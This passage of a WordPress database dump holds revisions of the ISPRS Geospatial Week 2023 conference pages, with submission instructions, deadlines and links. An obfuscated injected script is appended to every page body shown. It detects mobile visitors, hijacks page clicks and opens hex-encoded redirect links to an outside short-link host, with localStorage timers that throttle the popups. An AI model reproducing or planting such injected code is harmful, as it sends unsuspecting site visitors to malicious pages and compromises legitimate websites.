|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','WORKSHOPS','','inherit','closed','closed','','2372-revision-v1','','','2022-11-25 22:43:29','2022-11-25 22:43:29','',2372,'https://gsw2023.com/?p=3370',0,'revision','',0),
(3371,1,'2022-11-25 22:45:45','2022-11-25 22:45:45','<p>[vc_row][vc_column][dt_portfolio_slider order=\"asc\"][bsf-info-box icon_size=\"32\"]</p>\n<div class=\"three_quarter first\">\n<ul class=\"nospace\">\n<li style=\"text-align: justify;\">\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full<br />\npaper or an extended abstract to one of the following workshops :</h5>\n</li>\n</ul>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\"></li>\n</ul>\n<p>&nbsp;</p>\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract author notification: May 2023</strong></li>\n<li><strong>Full paper Author notification: May 2023</strong></li>\n<li><strong>Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-11-25 22:45:45','2022-11-25 22:45:45','',2659,'https://gsw2023.com/?p=3371',0,'revision','',0),
(3372,1,'2022-11-25 22:48:44','2022-11-25 22:48:44','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>[/vc_column_text][dt_portfolio_slider order=\"asc\"][bsf-info-box icon_size=\"32\"]</p>\n<div class=\"three_quarter first\">\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\"></li>\n</ul>\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract author notification: May 2023</strong></li>\n<li><strong>Full paper Author notification: May 2023</strong></li>\n<li><strong>Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const 